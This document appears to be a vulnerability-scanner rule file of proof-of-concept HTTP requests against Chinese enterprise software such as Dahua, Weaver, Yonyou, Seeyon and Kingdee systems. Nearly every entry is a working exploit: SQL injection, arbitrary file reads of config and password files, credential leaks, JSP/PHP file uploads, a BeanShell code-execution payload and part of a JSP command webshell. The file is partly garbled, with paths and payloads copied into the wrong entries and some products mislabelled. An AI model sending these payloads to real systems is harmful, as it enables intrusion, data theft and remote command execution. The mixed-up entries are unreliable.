- path: "/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B\"orderBy\":\"1%20and%201=updatexml(1,concat(0x7e,(select%20MD5(123456)),0x7e),1)--\"%7D/extend/%7B%7D"
- allow_redirects: false
- headers:
- content-type: ""
- user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)"
- cookie: ""
- TestCmd: ""
- body: ""
- matchers: "containsFunc(r\\.Text, \"e10adc3949ba59abbe56e057f20f883\")"
- rule1:
- requests:
- method: ""
- path: ""
- allow_redirects:
- headers:
- content-type: ""
- user-agent: ""
- cookie: ""
- TestCmd: ""
- body: ""
- matchers:
-
- - id: "大华智慧园区未授权账号密码"
- info:
- name: "大华智慧园区未授权账号密码泄露"
- author: "小燕子"
- severity: "High"
- verified: false
- description: "fid=\"+GO1WAVdxlPk6WCq1FIWDg==\""
- rules:
- rule0:
- requests:
- method: "GET"
- path: "/admin/user_getUserInfoByUserName.action?userName=system"
- allow_redirects: false
- headers:
- content-type: ""
- user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)"
- cookie: ""
- TestCmd: ""
- body: ""
- matchers: "containsFunc(r\\.Text, \"loginName\") && containsFunc(r\\.Text, \"loginPass\")"
- rule1:
- requests:
- method: ""
- path: ""
- allow_redirects:
- headers:
- content-type: ""
- user-agent: ""
- cookie: ""
- TestCmd: ""
- body: ""
- matchers:
-
- - id: "大华智慧园区综合管理平台emap文件上传"
- info:
- name: "大华智慧园区综合管理平台emap文件上传"
- author: "小燕子"
- severity: "High"
- verified: false
- description: "app=\"dahua-智慧园区综合管理平台\",上传路径:/upload/emap/society_new/ico_res_xxx.jsp"
- rules:
- rule0:
- requests:
- method: "POST"
- path: "/emap/devicePoint_addImgIco?hasSubsystem=true"
- allow_redirects: false
- headers:
- content-type: "multipart/form-data; boundary=00dahua0qax00"
- user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)"
- cookie: ""
- TestCmd: ""
- body: "\
- --00dahua0qax00\r\n\
- Content-Disposition: form-data; name=\"upload\"; filename=\"qax.jsp\"\r\n\
- Content-Type: application/octet-stream\r\n\
- \r\n\
- <%= \"Welcome to qax!\" %>\r\n\
- --00dahua0qax00--
- "
- matchers: "containsFunc(r\\.Text, \"ico_res_\") && containsFunc(r\\.Text, \".jsp\")"
- rule1:
- requests:
- method: ""
- path: ""
- allow_redirects:
- headers:
- content-type: ""
- user-agent: ""
- cookie: ""
- TestCmd: ""
- body: ""
- matchers:
-
- - id: "大华智慧园区综合管理平台video任意文件上传"
- info:
- name: "大华智慧园区综合管理平台video任意文件上传"
- author: "小燕子"
- severity: "High"
- verified: false
- description: "app=\"dahua-智慧园区综合管理平台\",上传路径:/publishingImg/VIDEO/xxxxxxxx.jsp"
- rules:
- rule0:
- requests:
- method: "POST"
- path: "/publishing/publishing/material/file/video"
- allow_redirects: false
- headers:
- content-type: "multipart/form-data; boundary=dd8f988919484abab3816881c55272a7"
- user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)"
- cookie: ""
- TestCmd: ""
- body: "\
- --dd8f988919484abab3816881c55272a7\r\n\
- Content-Disposition: form-data; name=\"Filedata\"; filename=\"Test.jsp\"\r\n\
- \r\n\
- Test\r\n\
- --dd8f988919484abab3816881c55272a7\r\n\
- Content-Disposition: form-data; name=\"Submit\"\r\n\
- \r\n\
- submit\r\n\
- --dd8f988919484abab3816881c55272a7--\r\n\
- "
- matchers: "containsFunc(r\\.Text, \"VIDEO/\") && containsFunc(r\\.Text, \"true\")"
- rule1:
- requests:
- method: ""
- path: ""
- allow_redirects:
- headers:
- content-type: ""
- user-agent: ""
- cookie: ""
- TestCmd: ""
- body: ""
- matchers:
-
- - id: "泛微OA-E-Office-uploadify 文件上传"
- info:
- name: "泛微OA-E-Office-uploadify 文件上传"
- author: "小燕子"
- severity: "High"
- verified: false
- description: "app=\"泛微-EOffice\""
- rules:
- rule0:
- requests:
- method: "POST"
- path: "/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B\"orderBy\":\"1%20and%201=updatexml(1,concat(0x7e,(select%20MD5(123456)),0x7e),1)--\"%7D/extend/%7B%7D"
- allow_redirects: false
- headers:
- content-type: "multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4"
- user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)"
- cookie: ""
- TestCmd: ""
- body: "\
- --e64bdf16c554bbc109cecef6451c26a4\r\n\
- Content-Disposition: form-data; name=\"Filedata\"; filename=\"qaxnb.php\"\r\n\
- Content-Type: image/jpeg\r\n\
- \r\n\
- \r\n\
- "
- matchers: "lengthFunc(r\\.Text, 10) && equalsFunc(r\\.StatusCode, 200)"
- rule1:
- requests:
- method: ""
- path: ""
- allow_redirects:
- headers:
- content-type: ""
- user-agent: ""
- cookie: ""
- TestCmd: ""
- body: ""
- matchers:
-
- - id: "用友U8_CRM客户关系管理系统_getemaildata 文件上传"
- info:
- name: "用友U8_CRM客户关系管理系统_getemaildata 文件上传"
- author: "小燕子"
- severity: "High"
- verified: false
- description: "body=\"用友U8CRM\""
- rules:
- rule0:
- requests:
- method: "POST"
- path: "/ajax/getemaildata.php?DontCheckLogin=1"
- allow_redirects: false
- headers:
- content-type: "multipart/form-data; boundary=----WebKitFormBoundarykS5RKgl8t3nwInMQ"
- user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)"
- cookie: ""
- TestCmd: ""
- body: "\
- ------WebKitFormBoundarykS5RKgl8t3nwInMQ\r\n\
- Content-Disposition: form-data; name=\"file\"; filename=\"test.php\"\r\n\
- Content-Type: text/plain\r\n\
- \r\n\
- \r\n\
- \r\n\
- ------WebKitFormBoundarykS5RKgl8t3nwInMQ\r\n\
- "
- matchers: "containsFunc(r\\.Text, \"tmp.mht\")"
- rule1:
- requests:
- method: ""
- path: ""
- allow_redirects:
- headers:
- content-type: ""
- user-agent: ""
- cookie: ""
- TestCmd: ""
- body: ""
- matchers:
-
- - id: "金蝶云星空CommonFileserver任意文件读取漏洞"
- info:
- name: "金蝶云星空CommonFileserver任意文件读取漏洞"
- author: "小燕子"
- severity: "High"
- verified: false
- description: "app=\"金蝶云星空-管理中心\""
- rules:
- rule0:
- requests:
- method: "GET"
- path: "/CommonFileServer/c:/windows/win.ini"
- allow_redirects: false
- headers:
- content-type: ""
- user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)"
- cookie: ""
- TestCmd: ""
- body: ""
- matchers: "containsFunc(r\\.Text, \"files\") && containsFunc(r\\.Text, \"fonts\") && equalsFunc(r\\.StatusCode, 200)"
- rule1:
- requests:
- method: ""
- path: ""
- allow_redirects:
- headers:
- content-type: ""
- user-agent: ""
- cookie: ""
- TestCmd: ""
- body: ""
- matchers:
-
- - id: "亿赛通电子文档安全管理系统_UploadFileFromClientServiceForClient 文件上传"
- info:
- name: "亿赛通电子文档安全管理系统_UploadFileFromClientServiceForClient 文件上传"
- author: "小燕子"
- severity: "High"
- verified: false
- description: "app=\"亿赛通-电子文档安全管理系统\""
- rules:
- rule0:
- requests:
- method: "POST"
- path: "/CDGServer3/UploadFileFromClientServiceForClient?AFMALANMJCEOENIBDJMKFHBANGEPKHNOFJBMIFJPFNKFOKHJNMLCOIDDJGNEIPOLOKGAFAFJHDEJPHEPLFJHDGPBNELNFIICGFNGEOEFBKCDDCGJEPIKFHJFAOOHJEPNNCLFHDAFDNCGBAEELJFFHABJPDPIEEMIBOECDMDLEPBJGBGCGLEMBDFAGOGM"
- allow_redirects: true
- headers:
- content-type: ""
- user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)"
- cookie: ""
- TestCmd: ""
- body: "qaxnb"
- matchers: ""
- rule1:
- requests:
- method: "GET"
- path: /tttT.jsp
- allow_redirects: false
- headers:
- content-type: ""
- user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)"
- cookie: ""
- TestCmd: ""
- body: ""
- matchers: "containsFunc(r\\.Text, \"qaxnb\") && equalsFunc(r\\.StatusCode, 200)"
-
- - id: "用友未授权"
- info:
- name: "用友未授权漏洞"
- author: "小燕子"
- severity: "High"
- verified: false
- description: "app=\"\""
- rules:
- rule0:
- requests:
- method: "GET"
- path: "/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID=/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID="
- allow_redirects: true
- headers:
- content-type: "application/x-www-form-urlencoded"
- user-agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
- cookie: ""
- TestCmd: ""
- body: ""
- matchers: "containsFunc(r\\.Text, \"发布 - IUFO\") && equalsFunc(r\\.StatusCode, 200)"
- rule1:
- requests:
- method: ""
- path:
- allow_redirects: false
- headers:
- content-type: ""
- user-agent: ""
- cookie: ""
- TestCmd: ""
- body: ""
- matchers: ""
-
- - id: "用友oa xxe漏洞"
- info:
- name: "用友oa xxe漏洞"
- author: "小燕子"
- severity: "High"
- verified: false
- description: "app=\"用友\""
- rules:
- rule0:
- requests:
- method: "POST"
- path: "/uapws/soapFormat.ajax"
- allow_redirects: true
- headers:
- content-type: "application/x-www-form-urlencoded"
- user-agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
- cookie: ""
- TestCmd: ""
- body: "msg= ]>
\"+excuteCmd(request.getParameter(\"cmd\")) + \"\");}else{out.println(\":-)\");}%>6e4f045d4b8506bf492ada7e3390d7ce\r\n - " - matchers: "" - rule1: - requests: - method: "GET" - path: "/seeyon/test123456.jsp?pwd=asasd3344&cmd=ipconfig" - allow_redirects: false - headers: - content-type: "application/x-www-form-urlencoded" - user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)" - cookie: "" - TestCmd: "" - body: "" - matchers: "containsFunc(r\\.Text, \"Windows IP\")" - - - id: "致远OA A8 状态监控页面信息泄露" - info: - name: "致远OA A8 状态监控页面信息泄露" - author: "小燕子" - severity: "High" - verified: false - description: "app=\"通达OA\"" - rules: - rule0: - requests: - method: "GET" - path: "/seeyon/management/status.jsp" - allow_redirects: false - headers: - content-type: "application/x-www-form-urlencoded" - user-agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36" - cookie: "" - TestCmd: "" - body: "" - matchers: "containsFunc(r\\.Text, \"password\") && equalsFunc(r\\.StatusCode, 200)" - rule1: - requests: - method: "" - path: "" - allow_redirects: false - headers: - content-type: "" - user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)" - cookie: "" - TestCmd: "" - body: "" - matchers: "" - - - id: "致远m1 server命令执行漏洞" - info: - name: "致远m1 server命令执行漏洞(可能)" - author: "小燕子" - severity: "High" - verified: false - description: "app=\"通达OA\"" - rules: - rule0: - requests: - method: "GET" - path: "/esn_mobile_pns/service/userTokenService" - allow_redirects: true - headers: - content-type: "application/x-www-form-urlencoded" - user-agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36" - cookie: "" - TestCmd: "" - body: "" - matchers: "equalsFunc(r\\.StatusCode, 500)" - rule1: - requests: - method: "" - path: "" - allow_redirects: false - headers: - content-type: "" - user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)" - cookie: "" - TestCmd: "" - body: "" - matchers: "" - - - id: "致远登录绕过" - info: - name: "致远登录绕过漏洞" - author: "小燕子" - severity: "High" - verified: false - description: "app=\"通达OA\"" - rules: - rule0: - requests: - method: "POST" - path: "/seeyon/thirdpartyController.do" - allow_redirects: true - headers: - content-type: "application/x-www-form-urlencoded" - user-agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36" - cookie: "" - TestCmd: "" - body: "method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1" - matchers: "containsFunc(r\\.Text, \"a8genius.do\")" - rule1: - requests: - method: "" - path: "" - allow_redirects: false - headers: - content-type: "" - user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)" - cookie: "" - TestCmd: "" - body: "" - matchers: "" - - - id: "致远OA A6 initDataAssess.jsp 用户敏感信息泄露" - info: - name: "致远OA A6 initDataAssess.jsp 用户敏感信息泄露" - author: "小燕子" - severity: "High" - verified: false - description: "app=\"通达OA\"" - rules: - rule0: - requests: - method: "GET" - path: "/yyoa/assess/js/initDataAssess.jsp" - allow_redirects: true - headers: - content-type: "application/x-www-form-urlencoded" - user-agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36" - cookie: "" - TestCmd: "" - body: "" - matchers: "containsFunc(r\\.Text, \"personList\") && containsFunc(r\\.Text, \"personHash\") && equalsFunc(r\\.StatusCode, 200)" - rule1: - requests: - method: "" - path: "" - allow_redirects: false - headers: - content-type: "" - user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)" - cookie: "" - TestCmd: "" - body: "" - matchers: "" - - - id: "致远OA ajax.do文件上传" - info: - name: "致远OA ajax.do文件上传(可能)" - author: "小燕子" - severity: "High" - verified: false - description: "app=\"通达OA\"" - rules: - rule0: - requests: - method: "GET" - path: "/seeyon/autoinstall.do.css/..;/ajax.do" - allow_redirects: true - headers: - content-type: "application/x-www-form-urlencoded" - user-agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36" - cookie: "" - TestCmd: "" - body: "" - matchers: "containsFunc(r\\.Text, \"java.lang.NullPointerException:null\") && equalsFunc(r\\.StatusCode, 200)" - rule1: - requests: - method: "" - path: "" - allow_redirects: false - headers: - content-type: "" - user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)" - cookie: "" - TestCmd: "" - body: "" - matchers: "" - - - id: "启莱OA treelist.aspx SQL注入漏洞" - info: - name: "启莱OA treelist.aspx SQL注入漏洞" - author: "小燕子" - severity: "High" - verified: false - description: "app=\"通达OA\"" - rules: - rule0: - requests: - method: "GET" - path: "/client/treelist.aspx?user=%27%20and%20(select%20@@version)>0--&pwd=1" - allow_redirects: true - headers: - content-type: "application/x-www-form-urlencoded" - user-agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36" - cookie: "" - TestCmd: "" - body: "" - matchers: "containsFunc(r\\.Text, \"Microsoft SQL Server\") && equalsFunc(r\\.StatusCode, 500)" - rule1: - requests: - method: "" - path: "" - allow_redirects: false - headers: - content-type: "" - user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)" - cookie: "" - TestCmd: "" - body: "" - matchers: "" - - - id: "启莱OA messageurl.aspx SQL注入漏洞" - info: - name: "启莱OA messageurl.aspx SQL注入漏洞" - author: "小燕子" - severity: "High" - verified: false - description: "app=\"通达OA\"" - rules: - rule0: - requests: - method: "GET" - path: "/client/messageurl.aspx?user=%27%20and%20(select%20@@version)>0--&pwd=1" - allow_redirects: true - headers: - content-type: "application/x-www-form-urlencoded" - user-agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36" - cookie: "" - TestCmd: "" - body: "" - matchers: "containsFunc(r\\.Text, \"Microsoft SQL Server\") && equalsFunc(r\\.StatusCode, 500)" - rule1: - requests: - method: "" - path: "" - allow_redirects: false - headers: - content-type: "" - user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)" - cookie: "" - TestCmd: "" - body: "" - matchers: "" - - - id: "启莱OA CloseMsg.aspx SQL注入漏洞" - info: - name: "启莱OA CloseMsg.aspx SQL注入漏洞" - author: "小燕子" - severity: "High" - verified: false - description: "app=\"通达OA\"" - rules: - rule0: - requests: - method: "GET" - path: "/client/CloseMsg.aspx?user=%27%20and%20(select%20@@version)>0--&pwd=1" - allow_redirects: true - headers: - content-type: "application/x-www-form-urlencoded" - user-agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36" - cookie: "" - TestCmd: "" - body: "" - matchers: "containsFunc(r\\.Text, \"Microsoft SQL Server\") && equalsFunc(r\\.StatusCode, 500)" - rule1: - requests: - method: "" - path: "" - allow_redirects: false - headers: - content-type: "" - user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)" - cookie: "" - TestCmd: "" - body: "" - matchers: "" - - - id: "启莱OA checkuser.aspx SQL注入漏洞" - info: - name: "启莱OA checkuser.aspx SQL注入漏洞" - author: "小燕子" - severity: "High" - verified: false - description: "app=\"通达OA\"" - rules: - rule0: - requests: - method: "GET" - path: "/client/checkuser.aspx?user=%27and%20@@version>0--&pwd=1" - allow_redirects: true - headers: - content-type: "application/x-www-form-urlencoded" - user-agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36" - cookie: "" - TestCmd: "" - body: "" - matchers: "containsFunc(r\\.Text, \"Microsoft SQL Server\") && equalsFunc(r\\.StatusCode, 500)" - rule1: - requests: - method: "" - path: "" - allow_redirects: false - headers: - content-type: "" - user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)" - cookie: "" - TestCmd: "" - body: "" - matchers: "" - - - id: "金和OA C6 download.jsp 任意文件读取漏洞" - info: - name: "金和OA C6 download.jsp 任意文件读取漏洞" - author: "小燕子" - severity: "High" - verified: false - description: "app=\"金和OA\"" - rules: - rule0: - requests: - method: "GET" - path: "/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config" - allow_redirects: true - headers: - content-type: "application/x-www-form-urlencoded" - user-agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36" - cookie: "" - TestCmd: "" - body: "" - matchers: "containsFunc(r\\.Text, \"configuration\") && containsFunc(r\\.Text, \"section\") && equalsFunc(r\\.StatusCode, 200)" - rule1: - requests: - method: "" - path: "" - allow_redirects: false - headers: - content-type: "" - user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)" - cookie: "" - TestCmd: "" - body: "" - matchers: "" - - - id: "蓝凌OA custom.jsp 任意文件读取漏洞" - info: - name: "蓝凌OA custom.jsp 任意文件读取漏洞" - author: "小燕子" - severity: "High" - verified: false - description: "app=\"蓝凌OA\"" - rules: - rule0: - requests: - method: "POST" - path: "/sys/ui/extend/varkind/custom.jsp" - allow_redirects: true - headers: - content-type: "application/x-www-form-urlencoded" - user-agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36" - cookie: "" - TestCmd: "" - body: "var={\"body\":{\"file\":\"/WEB-INF/KmssConfig/admin.properties\"}}" - matchers: "containsFunc(r\\.Text, \"password\") && containsFunc(r\\.Text, \"properties\") && equalsFunc(r\\.StatusCode, 200)" - rule1: - requests: - method: "" - path: "" - allow_redirects: false - headers: - content-type: "" - user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)" - cookie: "" - TestCmd: "" - body: "" - matchers: "" - - - id: "泛微E-Cology WorkflowServiceXml RCE" - info: - name: "泛微E-Cology WorkflowServiceXml RCE(可能)" - author: "小燕子" - severity: "High" - verified: false - description: "app=\"蓝凌OA\"" - rules: - rule0: - requests: - method: "GET" - path: "/services%20/WorkflowServiceXml" - allow_redirects: true - headers: - content-type: "application/x-www-form-urlencoded" - user-agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36" - cookie: "" - TestCmd: "" - body: "var={\"body\":{\"file\":\"/WEB-INF/KmssConfig/admin.properties\"}}" - matchers: "containsFunc(r\\.Text, \"Invalid SOAP request\") && equalsFunc(r\\.StatusCode, 200)" - rule1: - requests: - method: "" - path: "" - allow_redirects: false - headers: - content-type: "" - user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)" - cookie: "" - TestCmd: "" - body: "" - matchers: "" - - - id: "泛微OA LoginSSO.jsp SQL注入漏洞" - info: - name: "泛微OA LoginSSO.jsp SQL注入漏洞" - author: "小燕子" - severity: "High" - verified: false - description: "app=\"泛微E-Cology\"" - rules: - rule0: - requests: - method: "GET" - path: "/upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20password%20as%20id%20from%20HrmResourceManager" - allow_redirects: true - headers: - content-type: "application/x-www-form-urlencoded" - user-agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36" - cookie: "" - TestCmd: "" - body: "" - matchers: "containsFunc(r\\.Text, \"
\") && containsFunc(r\\.Text, \"\") && equalsFunc(r\\.StatusCode, 200)"
- rule1:
- requests:
- method: ""
- path: ""
- allow_redirects: false
- headers:
- content-type: ""
- user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)"
- cookie: ""
- TestCmd: ""
- body: ""
- matchers: ""
-
- - id: "泛微OA V8 SQL注入漏洞"
- info:
- name: "泛微OA V8 SQL注入漏洞"
- author: "小燕子"
- severity: "High"
- verified: false
- description: "app=\"泛微E-Cology\""
- rules:
- rule0:
- requests:
- method: "GET"
- path: "/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select+6412121cbb2dc2cb9e460cfee7046be+as+id"
- allow_redirects: true
- headers:
- content-type: "application/x-www-form-urlencoded"
- user-agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
- cookie: ""
- TestCmd: ""
- body: ""
- matchers: "containsFunc(r\\.Text, \"6412121cbb2dc2cb9e460cfee7046be\") && equalsFunc(r\\.StatusCode, 200)"
- rule1:
- requests:
- method: ""
- path: ""
- allow_redirects: false
- headers:
- content-type: ""
- user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)"
- cookie: ""
- TestCmd: ""
- body: ""
- matchers: ""
-
- - id: "泛微OA ln.FileDownload任意文件下载漏洞"
- info:
- name: "泛微OA ln.FileDownload任意文件下载漏洞"
- author: "小燕子"
- severity: "High"
- verified: false
- description: "app=\"泛微\""
- rules:
- rule0:
- requests:
- method: "GET"
- path: "/weaver/ln.FileDownload?fpath=conf/resin.conf"
- allow_redirects: true
- headers:
- content-type: "application/x-www-form-urlencoded"
- user-agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
- cookie: ""
- TestCmd: ""
- body: ""
- matchers: "containsFunc(r\\.Text, \"xmlns:resin\") && equalsFunc(r\\.StatusCode, 200)"
- rule1:
- requests:
- method: ""
- path: ""
- allow_redirects: false
- headers:
- content-type: ""
- user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)"
- cookie: ""
- TestCmd: ""
- body: ""
- matchers: ""
-
- - id: "ecology注入"
- info:
- name: "ecology注入"
- author: "小燕子"
- severity: "High"
- verified: false
- description: "app=\"泛微\""
- rules:
- rule0:
- requests:
- method: "GET"
- path: "/Api/portal/elementEcodeAddon/getSqlData?sql=select%20@@version"
- allow_redirects: true
- headers:
- content-type: "multipart/form-data; boundary=---------------------------WebKitFormBoundary6XgyjB6SeCArD3Hc"
- user-agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
- cookie: ""
- TestCmd: ""
- body: ""
- matchers: "containsFunc(r\\.Text, \"Microsoft SQL Server\")"
- rule1:
- requests:
- method: ""
- path: ""
- allow_redirects: false
- headers:
- content-type: ""
- user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)"
- cookie: ""
- TestCmd: ""
- body: ""
- matchers: ""
-
- - id: "泛微任意文件上传漏洞"
- info:
- name: "泛微任意文件上传漏洞"
- author: "小燕子"
- severity: "High"
- verified: false
- description: "app=\"泛微\""
- rules:
- rule0:
- requests:
- method: "POST"
- path: "/page/exportImport/uploadOperation.jsp"
- allow_redirects: true
- headers:
- content-type: "multipart/form-data; boundary=---------------------------WebKitFormBoundary6XgyjB6SeCArD3Hc"
- user-agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
- cookie: ""
- TestCmd: ""
- body: "\
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n\
- Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3\r\n\
- User-Agent: Mozilla/5.0(Windows NT 10.0;Win64;x64) AppleWebKit/537.36(KHTML, likeGecko) Chrome/92.0.4515.159 Safari/537.36\r\n\
- Accept-Encoding: gzip, deflate\r\n\
- X-Forwarded-For: 127.0.0.1\r\n
- Connection: close\r\n
- Upgrade-Insecure-Requests: 1\r\n
- Content-Type: multipart/form-data; boundary=---------------------------WebKitFormBoundary6XgyjB6SeCArD3Hc\r\n
- \r\n\
- ------WebKitFormBoundary6XgyjB6SeCArD3Hc\r\nContent-Disposition: form-data; name=\"file\"; filename=\"test456.jsp\"\r\nContent-Type: application/octet-stream\r\n\r\n202cb962ac59075b964b07152d234b70\r\n------WebKitFormBoundary6XgyjB6SeCArD3Hc--\r\n
- "
- matchers: ""
- rule1:
- requests:
- method: "GET"
- path: "/page/exportImport/fileTransfer/test456.jsp"
- allow_redirects: false
- headers:
- content-type: ""
- user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)"
- cookie: ""
- TestCmd: ""
- body: ""
- matchers: "containsFunc(r\\.Text, \"202cb962ac59075b964b07152d234b70\") && equalsFunc(r\\.StatusCode, 200)"
-
- - id: "泛微OA系统BshServlet命令执行漏洞"
- info:
- name: "泛微OA系统BshServlet命令执行漏洞"
- author: "小燕子"
- severity: "High"
- verified: false
- description: "app=\"泛微\""
- rules:
- rule0:
- requests:
- method: "POST"
- path: "/weaver/bsh.servlet.BshServlet"
- allow_redirects: true
- headers:
- content-type: "application/x-www-form-urlencoded"
- user-agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
- cookie: ""
- TestCmd: ""
- body: "bsh.script=import+org.apache.commons.codec.digest.DigestUtils%3Bprint%28DigestUtils.md5Hex%28%22123%22%29%29%0D%0A"
- matchers: "containsFunc(r\\.Text, \"202cb962ac59075b964b07152d234b70\") && equalsFunc(r\\.StatusCode, 200)"
- rule1:
- requests:
- method: ""
- path: ""
- allow_redirects: false
- headers:
- content-type: ""
- user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)"
- cookie: ""
- TestCmd: ""
- body: ""
- matchers: ""
-
- - id: "泛微云桥 e-Bridge 任意文件读取"
- info:
- name: "泛微云桥 e-Bridge 任意文件读取"
- author: "小燕子"
- severity: "High"
- verified: false
- description: "app=\"泛微\""
- rules:
- rule0:
- requests:
- method: "GET"
- path: "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt"
- allow_redirects: false
- headers:
- content-type: "application/x-www-form-urlencoded"
- user-agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
- cookie: ""
- TestCmd: ""
- body: ""
- matchers: "containsFunc(r\\.Text, \"id\") && equalsFunc(r\\.StatusCode, 200)"
- rule1:
- requests:
- method: ""
- path: ""
- allow_redirects: false
- headers:
- content-type: ""
- user-agent: "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)"
- cookie: ""
- TestCmd: ""
- body: ""
- matchers: ""
-
- - id: "帆软 V9 任意文件覆盖文件上传"
- info:
- name: "帆软 V9 任意文件覆盖文件上传"
- author: "小燕子"
